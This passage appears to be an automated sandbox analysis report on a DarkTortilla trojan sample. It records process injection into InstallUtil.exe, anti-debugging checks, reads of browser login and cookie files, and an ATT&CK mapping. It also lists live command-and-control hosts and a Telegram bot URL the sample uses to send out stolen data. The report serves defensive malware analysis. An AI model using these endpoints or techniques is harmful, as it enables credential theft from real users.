                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: InstallUtil.exe, 00000004.00000002.2543667182.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_04FE01F8 CheckRemoteDebuggerPresent,0_2_04FE01F8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76B008Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeQueries volume information: C:\Users\user\Desktop\5qJ6QQTcRS.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts
                    Windows Management Instrumentation1
                    Valid Accounts
                    1
                    Valid Accounts
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    111
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    1
                    Valid Accounts
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol1
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                    Process Injection
                    1
                    Access Token Manipulation
                    Security Account Manager141
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                    Virtualization/Sandbox Evasion
                    LSA Secrets1
                    System Network Configuration Discovery
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                    Process Injection
                    Cached Domain Credentials13
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Hidden Files and Directories
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
                    Obfuscated Files or Information
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Software Packing
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    DLL Side-Loading
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    5qJ6QQTcRS.exe75%ReversingLabsWin32.Trojan.DarkTortilla
                    5qJ6QQTcRS.exe67%VirustotalBrowse
                    5qJ6QQTcRS.exe100%AviraHEUR/AGEN.1305727
                    5qJ6QQTcRS.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    104.21.112.1
                    truefalse
                      high
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        checkip.dyndns.com
                        158.101.44.242
                        truefalse
                          high
                          checkip.dyndns.org
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              http://checkip.dyndns.org/false
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/InstallUtil.exe, 00000004.00000002.2545353858.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgInstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/bot5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              https://www.office.com/lBInstallUtil.exe, 00000004.00000002.2545353858.0000000002C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgInstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=enInstallUtil.exe, 00000004.00000002.2545353858.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:80815qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              http://aborters.duckdns.org:80815qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anotherarmy.dns.army:80815qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
